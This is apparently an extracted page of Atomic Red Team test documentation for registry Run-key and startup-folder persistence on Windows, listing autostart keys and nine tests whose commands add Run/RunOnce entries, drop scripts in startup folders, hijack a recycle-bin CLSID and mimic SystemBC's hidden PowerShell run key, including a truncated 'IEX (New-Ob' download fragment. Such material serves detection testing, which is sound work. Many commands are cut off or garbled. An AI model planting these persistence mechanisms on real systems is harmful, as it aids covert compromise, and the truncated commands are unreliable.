

- > T1037.001
- > T1037.002
- > T1037.004
- > T1037.005
- > T1039
- > T1040

HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot:

- HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServic esOnce
- HKEY\_CURRENT\_USER\Software\Microsoft\Windows\CurrentVersion\RunService sOnce
- HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
- HKEY\_CURRENT\_USER\Software\Microsoft\Windows\CurrentVersion\RunService
   s

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

- HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer\Run
- HKEY\_CURRENT\_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The

HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows

NT\CurrentVersion\Winlogon\Userinit and

HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows

NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.

Programs listed in the load value of the registry key

HKEY\_CURRENT\_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.

By default, the multistring BootExecute value of the registry key

HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk \* . This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use <a href="Masquerading">Masquerading</a> to make the Registry entries look as if they are associated with legitimate programs.

## **Atomic Tests**

- Atomic Test #1 Reg Key Run
- Atomic Test #2 Reg Key RunOnce
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- Atomic Test #4 Suspicious vbs file run from startup Folder
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- Atomic Test #9 SystemBC Malware-as-a-Service Registry

# Atomic Test #1 - Reg Key Run

Run Key Persistence

Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be via stdout.

Supported Platforms: Windows

auto\_generated\_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05

### Inputs:

Name	Description	Туре	Default Value
command_to_execute	Thing to Run	Path	C:\Path\AtomicRedTeam.exe

Attack Commands: Run with command\_prompt!

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic



#### **Cleanup Commands:**

REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atom □



# Atomic Test #2 - Reg Key RunOnce

RunOnce Key Persistence.

Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout.

Supported Platforms: Windows

auto\_generated\_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb

## Inputs:

Name	Description	Туре	Default Value
thing_to_execute Thing to R		Path	C:\Path\AtomicRedTeam.dll

Attack Commands: Run with command\_prompt! Elevation Required (e.g. root or admin)

REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\De



## **Cleanup Commands:**

REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001



# Atomic Test #3 - PowerShell Registry RunOnce

RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry.

Supported Platforms: Windows

auto\_generated\_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42

#### Inputs:

Name	Description	Туре	Default Value
thing_to_execute	Thing to Run	Path	powershell.exe
reg_key_path	Path to registry key to update	Path	HKLM:\Software\Microsoft\Windows\Currer

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```
$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Ob)
```

## **Cleanup Commands:**

```
Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorA 🖵
```

# Atomic Test #4 - Suspicious vbs file run from startup Folder

vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "\$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in.

Supported Platforms: Windows

auto\_generated\_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```
Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDAT. Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramD cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartU
```

## **Cleanup Commands:**

## Atomic Test #5 - Suspicious jse file run from startup Folder

jse files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "\$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in.

**Supported Platforms:** Windows

auto\_generated\_guid: dade9447-791e-4c8f-b04b-3a35855dfa06

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```
Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDAT. Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\ProgramCata\Cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\ProgramCata\Cscript.exe /E:Jscript "C:\ProgramData\Windows\Start Menu\ProgramCata\Cscript.exe /E:Jscript "C:\ProgramData\Windows\Start Menu\ProgramCata\Cscript.exe /E:Jscript "C:\ProgramData\Windows\Start Menu\ProgramCata\Cscript.exe /E:Jscript "C:\ProgramData\Windows\Start Menu\ProgramCata\Cscript.exe /E:Jsc
```

## **Cleanup Commands:**

# Atomic Test #6 - Suspicious bat file run from startup Folder

bat files can be placed in and executed from the startup folder to maintain persistance. Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "\$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in.

Supported Platforms: Windows

auto\_generated\_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```
Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDAT. Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramD Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Start Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Start Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Start Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Start Menu\
```

### **Cleanup Commands:**

# Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder

Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists.

Supported Platforms: Windows

auto\_generated\_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```
$Target = "C:\Windows\System32\calc.exe"

$ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\
$WScriptShell = New-Object -ComObject WScript.Shell
$Create = $WScriptShell.CreateShortcut($ShortcutLocation)
$Create.TargetPath = $Target
$Create.Save()
```

### **Cleanup Commands:**

Remove-Item "\$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs \Box

# Atomic Test #8 - Add persistance via Recycle bin

Add a persistance via Recycle bin <u>vxunderground</u> User have to clic on the recycle bin to lauch the payload (here calc)

**Supported Platforms**: Windows

auto\_generated\_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f

Attack Commands: Run with command\_prompt!

reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\cor  $\Box$ 

# II (open (cor 🗅

### **Cleanup Commands:**

reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open [

# n G

# Atomic Test #9 - SystemBC Malware-as-a-Service Registry

This Atomic will create a registry key called socks5\_powershell for persistance access https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c

**Supported Platforms:** Windows

auto\_generated\_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891

### Inputs:

Name	Description	Туре	Default Value
reg_key_value	Thing to Run	Path	powershell.exe -windowstyle hidden -Execution Bypass -File
reg_key_path	Path to registry key to update	Path	HKCU:\Software\Microsoft\Windows\CurrentVe

### Attack Commands: Run with powershell!

```
$RunKey = "#{reg_key_path}"

Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_k
```

### **Cleanup Commands:**

Remove-ItemProperty -Path #{reg\_key\_path} -Name "socks5\_powershell" -For